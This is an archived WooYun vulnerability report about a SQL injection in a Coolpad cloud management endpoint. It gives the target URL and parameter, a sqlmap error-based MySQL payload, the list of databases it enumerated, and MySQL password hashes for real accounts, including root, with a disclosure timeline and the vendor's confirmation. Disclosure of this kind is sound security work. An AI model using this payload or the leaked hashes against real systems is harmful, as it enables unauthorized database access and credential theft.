乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-09: 细节已通知厂商并且等待厂商处理中 2015-01-12: 厂商已经确认,细节仅向厂商公开 2015-01-22: 细节向核心白帽子及相关领域专家公开 2015-02-01: 细节向普通白帽子公开 2015-02-11: 细节向实习白帽子公开 2015-02-23: 细节向公众公开
酷派某处高危注入,root权限
http://manage.coolyun.com/report/appreport (POST)endDate=2015-01-08&ktype=&payTranslog.count=&payTranslog.failcause=¤tPage=&startDate=2015-01-08参数enddate
sqlmap identified the following injection points with a total of 36 HTTP(s) requests:---Place: POSTParameter: endDate Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: endDate=2015-01-08' AND (SELECT 2903 FROM(SELECT COUNT(*),CONCAT(0x3a6b64763a,(SELECT (CASE WHEN (2903=2903) THEN 1 ELSE 0 END)),0x3a69756c3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'JvPz'='JvPz&ktype=&payTranslog.count=&payTranslog.failcause=¤tPage=&startDate=2015-01-08---web application technology: PHP 5.4.13back-end DBMS: MySQL 5.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: endDate Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: endDate=2015-01-08' AND (SELECT 2903 FROM(SELECT COUNT(*),CONCAT(0x3a6b64763a,(SELECT (CASE WHEN (2903=2903) THEN 1 ELSE 0 END)),0x3a69756c3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'JvPz'='JvPz&ktype=&payTranslog.count=&payTranslog.failcause=¤tPage=&startDate=2015-01-08---web application technology: PHP 5.4.13back-end DBMS: MySQL 5.0available databases [12]:[*] coolmsg[*] db_yl_coolshow_charge_data[*] db_yl_coolshow_charge_data_20141118[*] db_yl_coolshow_charge_data_20150106[*] db_yl_coolshow_charge_data_20150109[*] db_yl_coolshow_charge_records[*] db_yl_health[*] db_yl_weather[*] information_schema[*] mysql[*] performance_schema[*] test
database management system users password hashes:[*] admin [1]: password hash: *A45ED16ACB66C7B8E6365D53A5718C7770A10DDA[*] coolcloud [1]: password hash: *681EAB6E64F2549A082F9DAAAA6D05D9171F4802[*] coolmsg [1]: password hash: *BECF2A4520E3ABA9A5C7B549D3E22CCDE99BC83D[*] coolshow [1]: password hash: *2BA75530738A4A2371FF1F606CE13484CDA4CE14[*] health [1]: password hash: *96E1E8EE2F15CD75D11757F0B0AFB48DC7B7D094[*] root [1]: password hash: *F66B0A1403B214CC3AC0CAACF3C0D8464E4E397A[*] weather [1]: password hash: *96E1E8EE2F15CD75D11757F0B0AFB48DC7B7D094
。。
危害等级:高
漏洞Rank:15
确认时间:2015-01-12 15:44
感谢提供,已提交给业务部门紧急处理。
暂无